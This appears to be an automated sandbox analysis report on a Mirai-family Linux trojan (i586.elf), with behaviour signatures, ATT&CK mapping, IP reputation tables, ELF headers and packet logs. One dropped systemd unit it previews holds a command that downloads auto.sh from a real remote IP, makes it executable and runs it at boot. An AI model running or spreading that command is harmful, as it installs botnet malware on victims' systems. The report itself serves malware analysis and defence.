Source: /usr/bin/dash (PID: 6311)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.n7e6qDIlaD /tmp/tmp.jHVnaNFY0j /tmp/tmp.dhaROQ2zZBJump to behavior
Source: /bin/sh (PID: 6273)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /bin/sh (PID: 6289)Systemctl executable: /usr/bin/systemctl -> systemctl enable startup_command.serviceJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/i586.elf (PID: 6269)Log files deleted: /var/log/kern.logJump to behavior
Source: /tmp/i586.elf (PID: 6267)File: /tmp/i586.elfJump to behavior
Source: /lib/systemd/systemd-hostnamed (PID: 6312)Queries kernel information via 'uname': Jump to behavior
Source: i586.elf, 6611.1.0000000008d18000.0000000008d25000.rw-.sdmpBinary or memory string: )/var/lib/vmware/VGAuth/aliasStore
Source: i586.elf, 6611.1.0000000008d16000.0000000008d18000.rw-.sdmpBinary or memory string: Q/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-gB0a9f)/tmp/vmware-root_721-4290559889
Source: i586.elf, 6611.1.0000000008d18000.0000000008d25000.rw-.sdmpBinary or memory string: )/var/lib/vmware/VGAuth/aliasStore
Source: i586.elf, 6611.1.0000000008d18000.0000000008d25000.rw-.sdmpBinary or memory string: /tmp/vmware-root_721-4290559889
Source: i586.elf, 6611.1.0000000008d18000.0000000008d25000.rw-.sdmpBinary or memory string: /var/lib/vmware
Source: i586.elf, 6611.1.0000000008d18000.0000000008d25000.rw-.sdmpBinary or memory string: /var/lib/vmware/VGAuth
Source: i586.elf, 6611.1.0000000008d18000.0000000008d25000.rw-.sdmpBinary or memory string: )/tmp/vmware-root_721-4290559889
Source: i586.elf, 6611.1.0000000008d18000.0000000008d25000.rw-.sdmpBinary or memory string: /var/lib/vmware/VGAuth/aliasStore
Source: i586.elf, 6611.1.0000000008d18000.0000000008d25000.rw-.sdmpBinary or memory string: !/var/lib/vmware/VGAuth
Source: i586.elf, 6611.1.0000000008d18000.0000000008d25000.rw-.sdmpBinary or memory string: /var/lib/vmwareI/var/lib/systemd/deb-systemd-helper-enabled/sysinit.target.wants
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid AccountsWindows Management Instrumentation1
Systemd Service
1
Systemd Service
1
Hidden Files and Directories
1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network Medium1
Service Stop
CredentialsDomainsDefault AccountsScheduled Task/Job2
Scripting
Boot or Logon Initialization Scripts1
Indicator Removal
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
File Deletion
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
Application Layer Protocol
Traffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1585003 Sample: i586.elf Startdate: 07/01/2025 Architecture: LINUX Score: 76 43 tcpdown.suaa 2->43 45 tcpdown.su 2->45 47 5 other IPs or domains 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 Machine Learning detection for sample 2->53 9 i586.elf 2->9         started        12 gnome-session-binary sh gsd-rfkill 2->12         started        14 systemd snapd-env-generator 2->14         started        16 6 other processes 2->16 signatures3 process4 signatures5 61 Sample deletes itself 9->61 18 i586.elf 9->18         started        process6 process7 20 i586.elf 18->20         started        23 i586.elf 18->23         started        25 i586.elf sh 18->25         started        27 i586.elf sh 18->27         started        signatures8 55 Manipulation of devices in /dev 20->55 57 Deletes system log files 20->57 29 i586.elf 20->29         started        31 i586.elf 20->31         started        33 i586.elf 20->33         started        41 40 other processes 20->41 59 Sample tries to kill multiple processes (SIGKILL) 23->59 35 i586.elf 23->35         started        37 sh systemctl 25->37         started        39 sh systemctl 27->39         started        process9
SourceDetectionScannerLabelLink
i586.elf55%ReversingLabsLinux.Trojan.Mirai
i586.elf100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://154.216.20.138/auto.sh0%Avira URL Cloudsafe
https://motd.ubuntu.come0%Avira URL Cloudsafe
http://154.216.20.138/auto.sh;0%Avira URL Cloudsafe
https://motd.ubuntu.comhe0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
tcpdown.su
45.200.149.167
truefalse
    high
    tcpdown.suaa
    unknown
    unknowntrue
      unknown
      tcpdown.su
      unknown
      unknowntrue
        unknown
        tcpdown.su
        unknown
        unknowntrue
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://154.216.20.138/auto.sh;i586.elf, startup_command.service.13.drfalse
          • Avira URL Cloud: safe
          unknown
          http://154.216.20.138/auto.shstartup_command.service.13.drfalse
          • Avira URL Cloud: safe
          unknown
          https://motd.ubuntu.comi586.elf, 6267.1.0000000008d16000.0000000008d18000.rw-.sdmp, i586.elf, 6267.1.00000000ff986000.00000000ff9a7000.rw-.sdmpfalse
            high
            https://motd.ubuntu.comei586.elf, 6267.1.00000000ff986000.00000000ff9a7000.rw-.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://motd.ubuntu.comhei586.elf, 6267.1.0000000008d16000.0000000008d18000.rw-.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            107.175.130.16
            unknownUnited States
            36352AS-COLOCROSSINGUSfalse
            34.249.145.219
            unknownUnited States
            16509AMAZON-02USfalse
            45.200.149.96
            unknownSeychelles
            328608Africa-on-Cloud-ASZAfalse
            109.202.202.202
            unknownSwitzerland
            13030INIT7CHfalse
            91.189.91.42
            unknownUnited Kingdom
            41231CANONICAL-ASGBfalse
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            107.175.130.16sh4.elfGet hashmaliciousUnknownBrowse
              powerpc.elfGet hashmaliciousUnknownBrowse
                i586.elfGet hashmaliciousUnknownBrowse
                  m68k.elfGet hashmaliciousUnknownBrowse
                    sparc.elfGet hashmaliciousUnknownBrowse
                      i686.elfGet hashmaliciousUnknownBrowse
                        arm.elfGet hashmaliciousUnknownBrowse
                          arm5.elfGet hashmaliciousUnknownBrowse
                            arm.elfGet hashmaliciousUnknownBrowse
                              arm5.elfGet hashmaliciousUnknownBrowse
                                34.249.145.219ppc.elfGet hashmaliciousUnknownBrowse
                                  hidakibest.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    Space.mpsl.elfGet hashmaliciousUnknownBrowse
                                      unix.arm5.elfGet hashmaliciousMiraiBrowse
                                        fenty.arm5.elfGet hashmaliciousMiraiBrowse
                                          c.elfGet hashmaliciousGafgytBrowse
                                            main.x86.elfGet hashmaliciousMiraiBrowse
                                              main.mpsl.elfGet hashmaliciousMiraiBrowse
                                                ub8ehJSePAfc9FYqZIT6.sh4.elfGet hashmaliciousUnknownBrowse
                                                  sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                    45.200.149.96powerpc.elfGet hashmaliciousUnknownBrowse
                                                      sparc.elfGet hashmaliciousUnknownBrowse
                                                        x86_64.elfGet hashmaliciousUnknownBrowse
                                                          arm.elfGet hashmaliciousUnknownBrowse
                                                            mips.elfGet hashmaliciousUnknownBrowse
                                                              mpsl.elfGet hashmaliciousUnknownBrowse
                                                                mpsl.elfGet hashmaliciousUnknownBrowse
                                                                  mips.elfGet hashmaliciousUnknownBrowse
                                                                    109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                                                                    • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                                                                    91.189.91.42gnjqwpc.elfGet hashmaliciousUnknownBrowse
                                                                      na.elfGet hashmaliciousUnknownBrowse
                                                                        Aqua.sh4.elfGet hashmaliciousMiraiBrowse
                                                                          res.x86.elfGet hashmaliciousUnknownBrowse
                                                                            main_arm5.elfGet hashmaliciousMiraiBrowse
                                                                              main_mips.elfGet hashmaliciousMiraiBrowse
                                                                                main_ppc.elfGet hashmaliciousMiraiBrowse
                                                                                  debug.dbg.elfGet hashmaliciousMiraiBrowse
                                                                                    ppc.elfGet hashmaliciousUnknownBrowse
                                                                                      spc.elfGet hashmaliciousMiraiBrowse
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        tcpdown.susparc.elfGet hashmaliciousUnknownBrowse
                                                                                        • 45.200.149.95
                                                                                        x86_64.elfGet hashmaliciousUnknownBrowse
                                                                                        • 45.200.149.95
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        Africa-on-Cloud-ASZAcZO.exeGet hashmaliciousUnknownBrowse
                                                                                        • 45.200.148.158
                                                                                        1.elfGet hashmaliciousUnknownBrowse
                                                                                        • 156.228.14.8
                                                                                        Fantazy.i686.elfGet hashmaliciousUnknownBrowse
                                                                                        • 156.228.99.12
                                                                                        Fantazy.arm4.elfGet hashmaliciousUnknownBrowse
                                                                                        • 45.198.94.253
                                                                                        Hilix.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                        • 45.196.17.137
                                                                                        Hilix.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                        • 156.246.150.168
                                                                                        Hilix.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                        • 156.246.102.239
                                                                                        Hilix.x86.elfGet hashmaliciousMiraiBrowse
                                                                                        • 156.228.141.243
                                                                                        Hilix.mips.elfGet hashmaliciousMiraiBrowse
                                                                                        • 156.228.63.14
                                                                                        powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                        • 45.200.149.249
                                                                                        AS-COLOCROSSINGUSmomo.mips.elfGet hashmaliciousMiraiBrowse
                                                                                        • 23.94.40.4
                                                                                        bash.elfGet hashmaliciousUnknownBrowse
                                                                                        • 107.173.129.144
                                                                                        cats.elfGet hashmaliciousConnectBackBrowse
                                                                                        • 107.173.129.144
                                                                                        DEMONS.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                        • 172.245.26.218
                                                                                        sh4.elfGet hashmaliciousUnknownBrowse
                                                                                        • 23.94.37.42
                                                                                        powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                        • 104.168.33.8
                                                                                        i586.elfGet hashmaliciousUnknownBrowse
                                                                                        • 107.175.130.16
                                                                                        m68k.elfGet hashmaliciousUnknownBrowse
                                                                                        • 107.175.130.16
                                                                                        sparc.elfGet hashmaliciousUnknownBrowse
                                                                                        • 104.168.33.8
                                                                                        i686.elfGet hashmaliciousUnknownBrowse
                                                                                        • 107.175.130.16
                                                                                        INIT7CHgnjqwpc.elfGet hashmaliciousUnknownBrowse
                                                                                        • 109.202.202.202
                                                                                        na.elfGet hashmaliciousUnknownBrowse
                                                                                        • 109.202.202.202
                                                                                        Aqua.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                        • 109.202.202.202
                                                                                        res.x86.elfGet hashmaliciousUnknownBrowse
                                                                                        • 109.202.202.202
                                                                                        main_arm5.elfGet hashmaliciousMiraiBrowse
                                                                                        • 109.202.202.202
                                                                                        main_mips.elfGet hashmaliciousMiraiBrowse
                                                                                        • 109.202.202.202
                                                                                        main_ppc.elfGet hashmaliciousMiraiBrowse
                                                                                        • 109.202.202.202
                                                                                        debug.dbg.elfGet hashmaliciousMiraiBrowse
                                                                                        • 109.202.202.202
                                                                                        ppc.elfGet hashmaliciousUnknownBrowse
                                                                                        • 109.202.202.202
                                                                                        spc.elfGet hashmaliciousMiraiBrowse
                                                                                        • 109.202.202.202
                                                                                        AMAZON-02USw3245.exeGet hashmaliciousUnknownBrowse
                                                                                        • 18.244.18.27
                                                                                        w3245.exeGet hashmaliciousUnknownBrowse
                                                                                        • 18.244.18.32
                                                                                        https://app.saner.ai/shared/notes/7353e5ae-dd5f-410b-92c3-210c9e88052aGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 13.33.187.74
                                                                                        Jeffparish.docxGet hashmaliciousUnknownBrowse
                                                                                        • 34.249.87.52
                                                                                        https://u43161309.ct.sendgrid.net/ls/click?upn=u001.L9-2FCbhkaoUACh7As3yZ8i4iABGphfl-2FJgS6Xiu1aw6I-3DgXpA_qO4VbBWAKg4gLfGs-2BfuSyZki3gKzG4I1DrYN15Q8fD7JV1twLeLo1AFs1GBSG3ZgA22dFJdXJloKc56aXDeV3olJKTBJd8NprednZ2LeXdX-2BkcSQE-2F2FRwgBng5RbUCLfjS8-2FI3mrpwyYu9lRatIB62qUwPSax-2Fhh2c7R-2B7pT3Kos0wK0SEJGj4ZMkgOGYhEniKYT7Kn7jN25xFz2sFdtPlVQkIdCFKwDNWmq-2BrAxerZE2GuKgfkuf3l1UY4J42sOOltybAAVyLhV-2BXfmbuQpN4NpshXRIuhta8ho3ChcTA5NtgjludQThyLtwhGns-2ByLqSbpO1Bhhc-2FCgdgP-2BAOxYrGHvKHjVYRr6-2BiryADxfM-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 18.153.4.44
                                                                                        https://dreamsmaybachawuradekasa.org/?dococbwt&qrc=ZHlsYW4uZHVmZnk4QHlhaG9vLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                        • 3.161.82.9
                                                                                        http://click.pstmrk.itGet hashmaliciousUnknownBrowse
                                                                                        • 18.245.46.12
                                                                                        https://www.figma.com/design/Sw6t5vElBVmnrFNiteka8B/Untitled-(Copy)?node-id=0-1&p=f&t=x9aFU3FgLH1rkKBK-0Get hashmaliciousUnknownBrowse
                                                                                        • 13.32.121.19
                                                                                        Remittance details.docxGet hashmaliciousUnknownBrowse
                                                                                        • 52.94.140.208
                                                                                        https://z97f4f2525fyg27.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                        • 52.222.232.99
                                                                                        No context
                                                                                        No context
                                                                                        Process:/tmp/i586.elf
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):361
                                                                                        Entropy (8bit):5.16738909970438
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:z8jvIERZAMzdK+KOnFfltZCrXbcCmBNcCm4RcCmO/Ls7QkhILQmWA4Rv:z+vIERZAOK+PCrXIpiQuj73GLHWrv
                                                                                        MD5:AF7D62B73266E0B457B114FE91F7E926
                                                                                        SHA1:11261AEF4573B56B67B32020049C69C7282FC212
                                                                                        SHA-256:14CB525E5A6B8AAF20C38672F8A9F974A684990888214848818326A739906642
                                                                                        SHA-512:3926FBB53496C3AAA34CC782BD5C8379E0AB94B11FE4E63BBBFEAC4E2B5057369C94BBE25AC56C3F04363076C91B978F9199FED97C5ED8377A6DC852B01EBFD9
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:[Unit].Description=Startup Command.After=network.target..[Service].ExecStart=cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.20.138/auto.sh || busybox wget http://154.216.20.138/auto.sh || curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh (null).RemainAfterExit=yes..[Install].WantedBy=multi-user.target.
                                                                                        Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):76
                                                                                        Entropy (8bit):3.7627880354948586
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                                                        MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                                                        SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                                                        SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                                                        SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                                                        Malicious:false
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                                                        File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
                                                                                        Entropy (8bit):6.2835209939212175
                                                                                        TrID:
                                                                                        • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                                                        • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                                                        File name:i586.elf
                                                                                        File size:70'796 bytes
                                                                                        MD5:2d0bd765ed70648d44343839f6927c45
                                                                                        SHA1:9348135e9d1e451b6b0b45b1017c5c6e29900a43
                                                                                        SHA256:cbf5056d52a2ae8703611527edd723b72dcfa0ea3c7576c09f728f379d124220
                                                                                        SHA512:f82ebd3fbda4d6ed0ae6baa9c317fcb0f5f8b7738c139972a7a8d4760349e610db5977c0172d9fd595beac0a9e26e088b259c4a395ca8985b13ce5cf451c0890
                                                                                        SSDEEP:1536:yPQsRePYB4WZhMXaH96kYVBKBoj1d21vlOmNtW:yPtMPYB4WZhMXoYmBoZdedPA
                                                                                        TLSH:EA634AC5A643E8F5EC2616702136E7374773F03E112EDA87C765D932ACA6940EA1739C
                                                                                        File Content Preview:.ELF....................d...4...........4. ...(.....................<...<...........................................Q.td............................U..S.......w....h........[]...$.............U......=.....t..5....$......$.......u........t....h<...........

                                                                                        ELF header

                                                                                        Class:ELF32
                                                                                        Data:2's complement, little endian
                                                                                        Version:1 (current)
                                                                                        Machine:Intel 80386
                                                                                        Version Number:0x1
                                                                                        Type:EXEC (Executable file)
                                                                                        OS/ABI:UNIX - System V
                                                                                        ABI Version:0
                                                                                        Entry Point Address:0x8048164
                                                                                        Flags:0x0
                                                                                        ELF Header Size:52
                                                                                        Program Header Offset:52
                                                                                        Program Header Size:32
                                                                                        Number of Program Headers:3
                                                                                        Section Header Offset:70396
                                                                                        Section Header Size:40
                                                                                        Number of Section Headers:10
                                                                                        Header String Table Index:9
                                                                                        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                        NULL0x00x00x00x00x0000
                                                                                        .initPROGBITS0x80480940x940x1c0x00x6AX001
                                                                                        .textPROGBITS0x80480b00xb00xe0a60x00x6AX0016
                                                                                        .finiPROGBITS0x80561560xe1560x170x00x6AX001
                                                                                        .rodataPROGBITS0x80561800xe1800x2cbc0x00x2A0032
                                                                                        .ctorsPROGBITS0x80590000x110000x80x00x3WA004
                                                                                        .dtorsPROGBITS0x80590080x110080x80x00x3WA004
                                                                                        .dataPROGBITS0x80590200x110200x29c0x00x3WA0032
                                                                                        .bssNOBITS0x80592c00x112bc0xeb000x00x3WA0032
                                                                                        .shstrtabSTRTAB0x00x112bc0x3e0x00x0001
                                                                                        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                        LOAD0x00x80480000x80480000x10e3c0x10e3c6.33840x5R E0x1000.init .text .fini .rodata
                                                                                        LOAD0x110000x80590000x80590000x2bc0xedc03.62250x6RW 0x1000.ctors .dtors .data .bss
                                                                                        GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Jan 7, 2025 00:31:48.704148054 CET458602601192.168.2.2345.200.149.96
                                                                                        Jan 7, 2025 00:31:48.709727049 CET26014586045.200.149.96192.168.2.23
                                                                                        Jan 7, 2025 00:31:48.709789038 CET458602601192.168.2.2345.200.149.96
                                                                                        Jan 7, 2025 00:31:48.709798098 CET458602601192.168.2.2345.200.149.96
                                                                                        Jan 7, 2025 00:31:48.715230942 CET26014586045.200.149.96192.168.2.23
                                                                                        Jan 7, 2025 00:31:48.715277910 CET458602601192.168.2.2345.200.149.96
                                                                                        Jan 7, 2025 00:31:48.720788002 CET26014586045.200.149.96192.168.2.23
                                                                                        Jan 7, 2025 00:31:48.829269886 CET43928443192.168.2.2391.189.91.42
                                                                                        Jan 7, 2025 00:31:49.522429943 CET26014586045.200.149.96192.168.2.23
                                                                                        Jan 7, 2025 00:31:49.522496939 CET458602601192.168.2.2345.200.149.96
                                                                                        Jan 7, 2025 00:31:49.522525072 CET458602601192.168.2.2345.200.149.96
                                                                                        Jan 7, 2025 00:31:50.509829998 CET39258443192.168.2.2334.249.145.219
                                                                                        Jan 7, 2025 00:31:50.558631897 CET4433925834.249.145.219192.168.2.23
                                                                                        Jan 7, 2025 00:31:55.248821020 CET571107722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:55.253830910 CET772257110107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:31:55.253896952 CET571107722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:55.253896952 CET571107722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:55.253896952 CET571107722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:55.258685112 CET772257110107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:31:55.274641037 CET571127722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:55.279438019 CET772257112107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:31:55.279503107 CET571127722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:55.279503107 CET571127722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:55.279525042 CET571127722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:55.284358978 CET772257112107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:31:55.293627024 CET571147722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:55.298389912 CET772257114107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:31:55.298445940 CET571147722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:55.298469067 CET571147722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:55.298477888 CET571147722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:55.302644968 CET772257110107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:31:55.303361893 CET772257114107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:31:55.326597929 CET772257112107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:31:55.346642017 CET772257114107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:31:55.631098032 CET772257110107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:31:55.631166935 CET571107722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:55.649274111 CET772257112107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:31:55.649331093 CET571127722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:55.691634893 CET772257114107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:31:55.691694021 CET571147722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:55.736008883 CET571167722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:55.740834951 CET772257116107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:31:55.740897894 CET571167722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:55.740942001 CET571167722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:55.740942001 CET571167722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:55.745696068 CET772257116107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:31:55.790679932 CET772257116107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:31:56.111342907 CET772257116107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:31:56.111408949 CET571167722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:57.691102028 CET571187722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:57.697755098 CET772257118107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:31:57.697835922 CET571187722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:57.697870016 CET571187722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:57.697870016 CET571187722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:57.703938961 CET772257118107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:31:57.715845108 CET571207722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:57.722287893 CET772257120107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:31:57.722376108 CET571207722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:57.722376108 CET571207722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:57.722414970 CET571207722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:57.728981972 CET772257120107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:31:57.743505001 CET571227722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:57.746623993 CET772257118107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:31:57.749620914 CET772257122107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:31:57.749701023 CET571227722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:57.749701023 CET571227722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:57.749742031 CET571227722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:57.755923986 CET772257122107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:31:57.770631075 CET772257120107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:31:57.798679113 CET772257122107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:31:58.064033031 CET772257118107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:31:58.064114094 CET571187722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:58.096292019 CET772257120107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:31:58.096393108 CET571207722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:31:58.148132086 CET772257122107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:31:58.148211956 CET571227722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:32:02.554738998 CET4433925834.249.145.219192.168.2.23
                                                                                        Jan 7, 2025 00:32:02.554824114 CET39258443192.168.2.2334.249.145.219
                                                                                        Jan 7, 2025 00:32:02.765875101 CET571247722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:32:02.770689011 CET772257124107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:32:02.770759106 CET571247722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:32:02.770759106 CET571247722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:32:02.770797968 CET571247722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:32:02.775532007 CET772257124107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:32:02.779968023 CET571267722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:32:02.784734011 CET772257126107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:32:02.784774065 CET571267722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:32:02.784797907 CET571267722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:32:02.784805059 CET571267722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:32:02.789585114 CET772257126107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:32:02.818633080 CET772257124107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:32:02.834672928 CET772257126107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:32:03.147216082 CET772257124107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:32:03.147290945 CET571247722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:32:03.154186964 CET772257126107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:32:03.155726910 CET571267722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:32:05.211020947 CET4251680192.168.2.23109.202.202.202
                                                                                        Jan 7, 2025 00:32:07.783751965 CET571287722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:32:07.790581942 CET772257128107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:32:07.790682077 CET571287722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:32:07.790695906 CET571287722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:32:07.790710926 CET571287722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:32:07.797734976 CET772257128107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:32:07.842633963 CET772257128107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:32:08.162010908 CET772257128107.175.130.16192.168.2.23
                                                                                        Jan 7, 2025 00:32:08.162102938 CET571287722192.168.2.23107.175.130.16
                                                                                        Jan 7, 2025 00:32:09.306451082 CET43928443192.168.2.2391.189.91.42
